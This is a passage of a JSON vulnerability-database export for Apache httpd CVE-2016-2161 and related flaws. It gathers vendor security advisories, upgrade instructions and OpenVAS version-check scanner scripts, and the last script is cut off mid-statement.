"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2161"], "modified": "2020-04-01T15:15:00", "cpe": ["cpe:/a:apache:http_server:2.4.19", "cpe:/a:apache:http_server:2.4.12", "cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.21", "cpe:/a:apache:http_server:2.4.20", "cpe:/a:apache:http_server:2.4.10", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.8", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.4.16", "cpe:/a:apache:http_server:2.4.22", "cpe:/a:apache:http_server:2.4.23", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.0", "cpe:/a:apache:http_server:2.4.14"], "id": "CVE-2016-2161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2161", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.4.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*"]}], "slackware": [{"lastseen": "2020-10-25T16:36:02", "bulletinFamily": "unix", 
"cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-5387", "CVE-2016-8740", "CVE-2016-8743"], "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.25-i586-1_slack14.2.txz: Upgraded.\n This update fixes the following security issues:\n * CVE-2016-8740: mod_http2: Mitigate DoS memory exhaustion via endless\n CONTINUATION frames.\n * CVE-2016-5387: core: Mitigate [f]cgi \"httpoxy\" issues.\n * CVE-2016-2161: mod_auth_digest: Prevent segfaults during client entry\n allocation when the shared memory space is exhausted.\n * CVE-2016-0736: mod_session_crypto: Authenticate the session data/cookie\n with a MAC (SipHash) to prevent deciphering or tampering with a padding\n oracle attack.\n * CVE-2016-8743: Enforce HTTP request grammar corresponding to RFC7230 for\n request lines and request headers, to prevent response splitting and\n cache pollution by malicious clients or downstream proxies.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8740\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5387\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2161\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8743\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.25-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.25-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.25-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.25-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.25-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.25-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.25-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.25-x86_64-1.txz\n\n\nMD5 signatures:\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.25-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2016-12-24T01:35:08", "published": "2016-12-24T01:35:08", "id": "SSA-2016-358-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.495677", "type": "slackware", "title": "[slackware-security] httpd", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:25", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "description": "\nApache Software Foundation reports:\n\nPlease reference CVE/URL list for details\n\n", "edition": 9, "modified": "2016-12-22T00:00:00", "published": "2016-12-20T00:00:00", "id": "862D6AB3-C75E-11E6-9F98-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/862d6ab3-c75e-11e6-9f98-20cf30e32f6d.html", "title": "Apache httpd -- several vulnerabilities", "type": "freebsd", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:25", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8740"], "description": "\nmod_http2 reports:\n\nThe Apache HTTPD web server (from 2.4.17-2.4.23) did not apply\n\t limitations on request headers correctly when experimental module\n\t for the HTTP/2 protocol is used to access a resource.\nThe net result is that a the server allocates too much memory\n\t instead of denying the request. 
This can lead to memory exhaustion\n\t of the server by a properly crafted request.\n\n", "edition": 5, "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "id": "CB0BF1EC-BB92-11E6-A9A5-B499BAEBFEAF", "href": "https://vuxml.freebsd.org/freebsd/cb0bf1ec-bb92-11e6-a9a5-b499baebfeaf.html", "title": "Apache httpd -- denial of service in HTTP/2", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "[2.4.6-45.0.1.4]\n- replace index.html with Oracle's index page oracle_index.html\n[2.4.6-45.4]\n- Resolves: #1396197 - Backport: mod_proxy_wstunnel - AH02447: err/hup\n on backconn\n[2.4.6-45.3]\n- prefork: fix delay completing graceful restart (#1327624)\n- mod_ldap: fix authz regression, failing to rebind (#1415257)\n[2.4.6-45.2]\n- updated patch for CVE-2016-8743\n[2.4.6-45.1]\n- Resolves: #1412975 - CVE-2016-0736 CVE-2016-2161 CVE-2016-8743 httpd: various\n flaws", "edition": 5, "modified": "2017-04-12T00:00:00", "published": "2017-04-12T00:00:00", "id": "ELSA-2017-0906", "href": "http://linux.oracle.com/errata/ELSA-2017-0906.html", "title": "httpd security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-8743"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. 
", "modified": "2016-12-25T03:26:41", "published": "2016-12-25T03:26:41", "id": "FEDORA:A9BA0608752F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: httpd-2.4.25-1.fc24", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-8743"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2016-12-25T02:14:19", "published": "2016-12-25T02:14:19", "id": "FEDORA:09EE06061CB6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: httpd-2.4.25-1.fc25", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8740"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2016-12-11T02:28:25", "published": "2016-12-11T02:28:25", "id": "FEDORA:15FCD60A94E9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: httpd-2.4.23-5.fc24", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8740"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2016-12-08T18:24:00", "published": "2016-12-08T18:24:00", "id": "FEDORA:E283A6139030", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: httpd-2.4.23-5.fc25", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:41:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "It was discovered that the Apache mod_session_crypto module was encrypting \ndata and cookies using either CBC or ECB modes. A remote attacker could \npossibly use this issue to perform padding oracle attacks. 
(CVE-2016-0736)\n\nMaksim Malyutin discovered that the Apache mod_auth_digest module \nincorrectly handled malicious input. A remote attacker could possibly use \nthis issue to cause Apache to crash, resulting in a denial of service. \n(CVE-2016-2161)\n\nDavid Dennerline and R\u00e9gis Leroy discovered that the Apache HTTP Server \nincorrectly handled unusual whitespace when parsing requests, contrary to \nspecifications. When being used in combination with a proxy or backend \nserver, a remote attacker could possibly use this issue to perform an \ninjection attack and pollute cache. This update may introduce compatibility \nissues with clients that do not strictly follow HTTP protocol \nspecifications. A new configuration option \"HttpProtocolOptions Unsafe\" can \nbe used to revert to the previous unsafe behaviour in problematic \nenvironments. (CVE-2016-8743)", "edition": 68, "modified": "2017-05-09T00:00:00", "published": "2017-05-09T00:00:00", "id": "USN-3279-1", "href": "https://ubuntu.com/security/notices/USN-3279-1", "title": "Apache HTTP Server vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "amazon": [{"lastseen": "2020-11-10T12:34:38", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "**Issue Overview:**\n\nThe following security-related issues were fixed:\n\nPadding oracle vulnerability in Apache mod_session_crypto ([CVE-2016-0736 __](<https://access.redhat.com/security/cve/CVE-2016-0736>)) \nDoS vulnerability in mod_auth_digest ([CVE-2016-2161 __](<https://access.redhat.com/security/cve/CVE-2016-2161>)) \nApache HTTP request parsing whitespace defects ([CVE-2016-8743 __](<https://access.redhat.com/security/cve/CVE-2016-8743>))\n\n \n**Affected Packages:** \n\n\nhttpd24\n\n \n**Issue Correction:** \nRun _yum update httpd24_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n mod24_ssl-2.4.25-1.68.amzn1.i686 \n httpd24-2.4.25-1.68.amzn1.i686 \n httpd24-debuginfo-2.4.25-1.68.amzn1.i686 \n httpd24-devel-2.4.25-1.68.amzn1.i686 \n mod24_session-2.4.25-1.68.amzn1.i686 \n mod24_ldap-2.4.25-1.68.amzn1.i686 \n mod24_proxy_html-2.4.25-1.68.amzn1.i686 \n httpd24-tools-2.4.25-1.68.amzn1.i686 \n \n noarch: \n httpd24-manual-2.4.25-1.68.amzn1.noarch \n \n src: \n httpd24-2.4.25-1.68.amzn1.src \n \n x86_64: \n httpd24-2.4.25-1.68.amzn1.x86_64 \n httpd24-debuginfo-2.4.25-1.68.amzn1.x86_64 \n mod24_session-2.4.25-1.68.amzn1.x86_64 \n mod24_proxy_html-2.4.25-1.68.amzn1.x86_64 \n mod24_ldap-2.4.25-1.68.amzn1.x86_64 \n mod24_ssl-2.4.25-1.68.amzn1.x86_64 \n httpd24-devel-2.4.25-1.68.amzn1.x86_64 \n httpd24-tools-2.4.25-1.68.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2017-01-19T16:30:00", "published": "2017-01-19T16:30:00", "id": "ALAS-2017-785", "href": "https://alas.aws.amazon.com/ALAS-2017-785.html", "title": "Medium: httpd24", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T00:51:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3796-1 security@debian.org\nhttps://www.debian.org/security/ Sebastien Delafond\nFebruary 26, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nCVE ID : CVE-2016-0736 CVE-2016-2161 CVE-2016-8743\n\nSeveral vulnerabilities were discovered in the Apache2 HTTP server.\n\nCVE-2016-0736\n\n RedTeam Pentesting GmbH discovered that mod_session_crypto was\n vulnerable to padding oracle attacks, which could allow an attacker\n to guess the session cookie.\n\nCVE-2016-2161\n\n Maksim Malyutin discovered that malicious input to mod_auth_digest\n could cause the 
server to crash, causing a denial of service.\n\nCVE-2016-8743\n\n David Dennerline, of IBM Security's X-Force Researchers, and R\u00e9gis\n Leroy discovered problems in the way Apache handled a broad pattern\n of unusual whitespace patterns in HTTP requests. In some\n configurations, this could lead to response splitting or cache\n pollution vulnerabilities. To fix these issues, this update makes\n Apache httpd be more strict in what HTTP requests it accepts.\n\n If this causes problems with non-conforming clients, some checks can\n be relaxed by adding the new directive "HttpProtocolOptions unsafe"\n to the configuration.\n\nThis update also fixes the issue where mod_reqtimeout was not enabled\nby default on new installations.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.4.10-10+deb8u8.\n\nFor the testing (stretch) and unstable (sid) distributions, these\nproblems have been fixed in version 2.4.25-1.\n\nWe recommend that you upgrade your apache2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 10, "modified": "2017-02-26T18:27:01", "published": "2017-02-26T18:27:01", "id": "DEBIAN:DSA-3796-1:1E6E3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00049.html", "title": "[SECURITY] [DSA 3796-1] apache2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2017-08-23T11:20:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "Several vulnerabilities were discovered in the Apache2 HTTP server.\n\nCVE-2016-0736 \nRedTeam Pentesting GmbH discovered that mod_session_crypto was\nvulnerable to padding oracle attacks, which could allow an 
attacker\nto guess the session cookie.\n\nCVE-2016-2161 \nMaksim Malyutin discovered that malicious input to mod_auth_digest\ncould cause the server to crash, causing a denial of service.\n\nCVE-2016-8743 \nDavid Dennerline, of IBM Security", "modified": "2017-08-08T00:00:00", "published": "2017-02-26T00:00:00", "id": "OPENVAS:703796", "href": "http://plugins.openvas.org/nasl.php?oid=703796", "type": "openvas", "title": "Debian Security Advisory DSA 3796-1 (apache2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3796.nasl 6873 2017-08-08 12:35:26Z teissa $\n# Auto-generated from advisory DSA 3796-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703796);\n script_version(\"$Revision: 6873 $\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_name(\"Debian Security Advisory DSA 3796-1 (apache2 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-08-08 14:35:26 +0200 (Tue, 08 Aug 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-02-26 00:00:00 +0100 (Sun, 26 Feb 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3796.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"apache2 on Debian Linux\");\n script_tag(name: \"insight\", value: \"The Apache HTTP Server Project's goal is to build a secure, efficient and\nextensible HTTP server as standards-compliant open source software. 
The\nresult has long been the number one web server on the Internet.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these problems have been fixed in\nversion 2.4.10-10+deb8u8.\n\nFor the testing (stretch) and unstable (sid) distributions, these\nproblems have been fixed in version 2.4.25-1.\n\nWe recommend that you upgrade your apache2 packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were discovered in the Apache2 HTTP server.\n\nCVE-2016-0736 \nRedTeam Pentesting GmbH discovered that mod_session_crypto was\nvulnerable to padding oracle attacks, which could allow an attacker\nto guess the session cookie.\n\nCVE-2016-2161 \nMaksim Malyutin discovered that malicious input to mod_auth_digest\ncould cause the server to crash, causing a denial of service.\n\nCVE-2016-8743 \nDavid Dennerline, of IBM Security's X-Force Researchers, and R\u00e9gis\nLeroy discovered problems in the way Apache handled a broad pattern\nof unusual whitespace patterns in HTTP requests. In some\nconfigurations, this could lead to response splitting or cache\npollution vulnerabilities. 
To fix these issues, this update makes\nApache httpd be more strict in what HTTP requests it accepts.\n\nIf this causes problems with non-conforming clients, some checks can\nbe relaxed by adding the new directive HttpProtocolOptions unsafe \n\nto the configuration.\n\nThis update also fixes the issue where mod_reqtimeout was not enabled\nby default on new installations.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-ssl-dev\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.25-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"libapache2-mod-macro\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-proxy-html\", ver:\"2.4.10-10+deb8u8\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-01-27T18:40:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171086", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171086", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1086)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1086\");\n script_version(\"2020-01-23T10:48:38+0000\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:48:38 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:48:38 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1086)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1086\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1086\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'httpd' package(s) announced via the EulerOS-SA-2017-1086 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. 
A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\nIt was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\nIt was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\");\n\n script_tag(name:\"affected\", value:\"'httpd' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == 